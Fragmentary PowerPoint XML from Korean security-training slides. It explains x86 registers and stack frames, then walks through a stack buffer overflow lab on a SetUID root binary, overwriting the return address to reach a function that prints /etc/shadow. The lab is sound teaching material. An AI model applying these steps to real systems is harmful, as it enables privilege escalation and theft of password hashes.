            <a:ext cx="2078766" cy="19119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477217-15EE-4902-869D-049CBACCAE54}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9536329" y="4070060"/>
            <a:ext cx="7354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413065-392F-4C07-8928-092718753163}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9536329" y="3277864"/>
            <a:ext cx="7354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8706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범용 레지스터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8B8D674E-A205-4EA5-B390-E71BBA9D9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67" b="44132"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="755903" y="3497816"/>
            <a:ext cx="4611625" cy="12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내용 개체 틀 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BBD847FB-5DFD-4C06-A9F5-9E954FDE39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49767" y="2139696"/>
          <a:ext cx="5680546" cy="3749040"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="815937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1077728472"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="3980689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</a:tblGrid>
              <a:tr h="326902"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범용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레지스터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EAX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산술 연산 및 논리 연산 수행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EBX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메모리 주소 저장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11002"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="510751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ECX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반복문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 사용 시 반복 카운터로 사용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반복할 횟수 지정하고 반복 작업 수행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766126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EDX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EAX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레지스터와 같이 쓰임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부호 확장 명령 등에 사용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큰 수의 곱셈 또는 나눗셈 연산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EDI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복사할 때 목적지 주소 저장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ESI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데이터를 조작하거나 복사할 때 데이터의 주소 저장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18544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ESP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메모리 스택의 끝 지점 주소 포인터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2555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EBP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메모리 스택의 첫 시작 주소 포인터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318716"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="510751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EIP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</a:b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다음에 실행해야 할 명령어의 주소 포인터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19258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F923A64-ACB8-4426-B10D-EF30114C7CC5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="517284" y="2332714"/>
            <a:ext cx="5113220" cy="79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범용 레지스터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레지스터들 중에서 각각 특별한 용도가 정해져 있는 레지스터</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="204752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BB2ACF1-7215-471F-B6E0-081714EE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4" y="2026232"/>
            <a:ext cx="5297351" cy="36613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범용 레지스터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814B75-819F-46B6-805F-DCFADAC9A079}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4267200" y="2104792"/>
            <a:ext cx="1914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5A0F43-3065-463B-AA7E-1BE7E4F501B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6246386" y="2026232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이전 스택의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>base pointer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>을 저장한다  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=  SFP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55706FD-9937-4194-AFF6-E3D0A0106830}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4565904" y="2287672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FB1239-C138-4054-A166-AB6EDBB73630}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6246386" y="2209112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이전 스택의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>esp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 err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ebp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에 저장한다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26CC0EE-73CC-4F0A-BF8A-8D3CE56E21F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4639056" y="2470552"/>
            <a:ext cx="1542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97CC9-140F-4D29-B084-C95A8E1A2B49}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6246386" y="2391992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Esp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의 스택을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x60 = 96</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 늘린다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. = 4*20 + 16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517A26B-8831-4F91-B2E8-43B1247E816D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5730240" y="2818024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2864CE-DD73-473B-B555-ADE96938F605}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6246386" y="2739464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합</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(heap) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>할당 함수 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>malloc </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>실행 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: C = malloc( … )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A70704F-5A0F-492C-AAF0-C839C1873D21}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4565904" y="2644288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AC2E85-44A3-4DEE-BB89-501E28F3DEE1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6246386" y="2565728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Edi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>로 변수인자를 넘긴다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en-US" altLang="ko-KR" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sizeof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(int) = 4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77BA5E-8017-444A-9A91-C0B6C7A4B0B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5730240" y="335044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BBD97C-B661-4011-B444-4AC86E842C1D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6246386" y="3271880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Printf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  <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 함수 실행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A41DCC-AF07-4580-AB69-C13A8D9C53A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4992624" y="3176704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F293D1-6206-4F1B-AC1F-CD47C6DAD71D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6246386" y="3098144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Edi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill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</a:rPr>
              <a:t>, “1” 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주소값을</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 불러온다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47B542-A4CF-4072-9489-3728752EDE75}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8394192" y="4172712"/>
            <a:ext cx="2072640" cy="1389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b[20]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CCBB6-017A-402A-B708-811B6BF387E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8394192" y="5733971"/>
            <a:ext cx="2072640" cy="131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7876E6-393C-4271-A80A-EF5EF6010938}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7833360" y="418864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AD89857-6779-428D-99B5-38FAC8527C3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6906768" y="3882169"/>
            <a:ext cx="831070" cy="385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rsp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rbp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> - 96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FDAC04E-0C32-43B0-AE3D-BA9C91FFFF21}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7833360" y="5865041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812DE2-FDDD-4FBB-AEF5-28F1A9DEE926}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7174992" y="5786481"/>
            <a:ext cx="562846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rbp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38BC1DB-0D7E-4E08-92B1-8CEC56FA449D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8394192" y="5591548"/>
            <a:ext cx="2072640" cy="131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SFP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9A9566A-0DCB-4211-8558-813E6E6D105C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7784592" y="556260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44B4D0-BB90-450D-BFD1-71537A50D05F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6858000" y="5484040"/>
            <a:ext cx="831070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rbp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> - 16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698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범용 레지스터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1981065-B258-4705-9F49-9AA19C7D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87904"/>
            <a:ext cx="3918131" cy="3669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5D14B9-5DA6-4AE7-A5BF-CD6E8EFF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22" y="2779296"/>
            <a:ext cx="6391275" cy="781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D57461-3057-40F9-9CC6-D61932E99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22" y="2172080"/>
            <a:ext cx="2615847" cy="565023"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="39" name="Picture 4" descr="아스키 코드표">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB771A46-7BCD-40E5-A3BF-DE7EC893F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1" r="33210" b="63562"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5289422" y="4634961"/>
            <a:ext cx="2194561" cy="179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아스키 코드표">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C12FD55D-CE08-44EF-9306-0B7493689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48557" r="66513" b="18054"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7687057" y="4710113"/>
            <a:ext cx="2206751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0021EB-70AC-4C11-81DE-8C81281EF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422" y="3579347"/>
            <a:ext cx="55721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826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a Buffer Overflow Attack? ⚔️ Types, Examples">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28936090-CDA9-4037-82F4-93F6F95D8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816" y="1347537"/>
            <a:ext cx="8522368" cy="511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BD1FF58-991E-4299-8B55-4F47E8B42413}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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</a:t>
            </a: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. buffer overflow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900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/Training/Unit/Sys/8</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4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Buffer Overflow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공격 및 방어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/bof64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 존재하는 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함수가 실행되도록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디스어셈블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objdump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 intel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바이너리 파일 이름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 복귀 주소를 조작할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100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이용한 복귀 주소 조작에 대응할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6.4)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D4016FD-501C-4282-900C-883412B2BAA0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724D9F0-FF13-4AF3-8FF3-E28D36330FB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8CD331-CD08-4A67-9051-38693C5B197F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B6D6D78E-F1DC-4B1A-9DB9-A4115BF300E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99772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/>
              <a:t>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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/sec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/>
              <a:t>/sec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/bof64 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일의 속성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ls –l bof64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/>
              <a:t>※ SetUID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>가 설정되어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소유자가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>임을 알 수 있음 ⇒ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>root </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>권한으로 실행 가능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/>
              <a:t>/sec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/bof64.c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vim bof64.c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foo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>함수에서 버퍼 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>오버플로우</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(BOF) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>취약점을 가진 함수</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>가 사용됨을 확인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※ bar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>함수에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>root </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>권한으로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/shadow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>파일 내용을 출력</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>함을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/>
              <a:t>/sec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/bof64 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일을 실행하여 힌트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./bof64 AAAA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※ bar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>함수의 시작 주소 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>: 0x0000000000400635 ⇒ BOF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>취약점 이용하여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</a:rPr>
              <a:t>복귀 주소를 조작하면 </a:t>
            </a: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</a:rPr>
              <a:t>bar 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</a:rPr>
              <a:t>함수 실행 가능</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5">
                  <a:lumMod val="75000"/>
                </a:schemeClr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7" name="Picture 48">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{727D84AA-90AB-4EB7-B278-E4DDF745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5" y="1398059"/>
            <a:ext cx="403479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50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29D58818-0FB8-42B4-AB48-3554D670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13" y="3047806"/>
            <a:ext cx="4989449" cy="281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52">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A528125-FF0A-4A9C-A648-6C05C1C39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367" b="56894"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6318251" y="899528"/>
            <a:ext cx="2997200" cy="8802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9A5F22-DB43-4D03-88B5-651588C39286}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6301370" y="2457302"/>
          <a:ext cx="4932807" cy="3703407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236843578"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="2878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635548"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="330462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위에서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직후의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985868"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="38913" name="_x564967160">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12EBF08F-9CBE-4E11-BC20-9429D8012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630" y="3075572"/>
            <a:ext cx="3552825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783DDA-DF65-46EC-9240-900D44B5856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0BA43B6-A757-4F14-B55A-F621E8A1D6AC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EFBF47-2D0F-4850-87A0-9DF7152DABE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F1F6CCCE-BE66-417C-A423-039F4B05EE28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7046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objdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>사용하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>disassemble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$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>objdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>M intel </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>-d bof64 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>| more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ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>스택 버퍼 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>오버플로우</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 취약점이 있는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>foo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>함수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버퍼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tmp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의 시작 주소가 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rbp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 - 16(0x10)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>임을 확인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7" name="Picture 54">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A14AF77C-BB85-48EE-A741-3945FDC0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75" y="936036"/>
            <a:ext cx="5014341" cy="27857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56">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E368D99-6D3F-4489-A11B-6A622DFC0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" b="35736"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="497975" y="4108245"/>
            <a:ext cx="4947604" cy="20639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E60104-4003-4ECA-892D-8CA49033ECAE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6321475" y="461749"/>
          <a:ext cx="5340017" cy="5891961"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="5340017">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="848009183"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="2233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454" marR="41454" marT="11461" marB="114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73759"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="56586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함수에서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함수로 진입한 시점의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그러므로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버퍼의 크기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(10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더 긴 문자열을 넘기면 아래와 같이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함수로 복귀할 때 사용되는 주소를 변경시킬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41454" marR="41454" marT="11461" marB="1146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848564"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
